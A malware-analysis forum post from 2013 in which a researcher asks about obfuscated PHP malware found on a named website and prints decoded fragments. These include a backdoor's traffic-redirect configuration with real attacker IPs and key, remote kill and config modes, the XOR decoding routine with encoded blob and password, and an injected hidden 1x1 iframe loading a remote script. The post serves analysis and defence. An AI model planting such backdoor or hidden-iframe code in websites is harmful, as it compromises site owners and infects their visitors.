A forum for reverse engineering, OS internals and malware analysis 

Unknown php malware

Forum for analysis and discussion about malware.

Unknown php malware

 #19559  by Xylitol
 Wed Jun 05, 2013 8:32 pm
If someone have infos ?
PHP obfuscated file found on hxxp://www.dboulaisdance.ca

Some junk decoded:
Code: Select all
 $c["url"]=$_POST["ptds"];
 $c["ip"]=$_POST["ptdsip"];
 $c["lin"]=$_POST["pto"];
 $c["id"]=$_POST["pesdid"];
 $c["key"]=$_POST["pkey"];

if($mode== "kill"AND $c["key"]==$_REQUEST["key"]){
 chmod("777",$_SERVER["SCRIPT_FILENAME"]);
 if(unlink($_SERVER["SCRIPT_FILENAME"]))
  die("ok\n");

}
a:5:{s:3:"url";s:34:"http://37.9.50.222/olods/stats.php";s:2:"ip";s:11:"37.9.50.222";s:3:"lin";s:17:"http://localhost/";s:2:"id";s:5:"50516";s:3:"key";s:24:"xNJqaDj9PdpFsIqzVpayMWjj";}

if($mode== "config"AND $c["key"]==$_REQUEST["key"]){
echo "<form name=\"form1\" method=\"post\" action=?mode=setconfig&key= ".$_REQUEST["key"] ."><pre>
TDS:     <input type=\"text\" name=\"ptds\" value=" .$c["url"] .">  TDS IP:  <input type=\"text\" name=\"ptdsip\" value=" .$c[ip] .">
KEY:     <input type=\"text\" name=\"pkey\" value=" .$c["key"] .">  Reserve: <input type=\"text\" name=\"pto\" value=" .$c[lin] .">
ID:      <input type=\"text\" name=\"pesdid\" value=" .$c["id"] .">  <input type=\"submit\" name=\"Submit\" value=\"ok\"></pre>
</form>

HTTP/1.0\r\n
Host: \r\n
Connection: Close\r\n\r\n\r\n
dodo lin200lin://httpHTTP/1.1 302 FoundLocation: cook&=echo'
function used for the decode:
Code: Select all
function string_cpt($String , $Password)
{
         $Salt = "mpf";
         $StrLen = strlen($String);
         $Seq = $Password;
         $Gamma = '';
        while (strlen($Gamma) < ($StrLen)){
                $Seq=pack("H*",sha1($Gamma .$Seq .$Salt));
                $Gamma.=substr($Seq,0,8);
       }
    return $String^$Gamma;
}
$cfg = "dKlpckfl7VVL601EleY912xvcbYNxtsQPf5EI7bu3p9cGNdqghtSpoqN3Igxh2uNqCdF36kw9eyaXDtevkXF6BR2lxW9NGaGJaF0JDqwdiul/I$

echo "config : \n\n";
echo string_cpt(base64_decode($cfg),"WQ2bTZ8gt");
this is also a infected file 'index.phtml' on the server:
Code: Select all
    ukh.src = 'http://140.174.114.199/clk.php';
    ukh.style.position = 'absolute';
    ukh.style.border = '0';
    ukh.style.height = '1px';
    ukh.style.width = '1px';
    ukh.style.left = '1px';
    ukh.style.top = '1px';
Edit: Kahu security made me a clean decoded version, thanks Daryl (it's in attach).
Attachments
infected
(7.04 KiB) Downloaded 49 times
infected
(3.34 KiB) Downloaded 48 times
infected
(3.89 KiB) Downloaded 44 times
 Return to “Malware”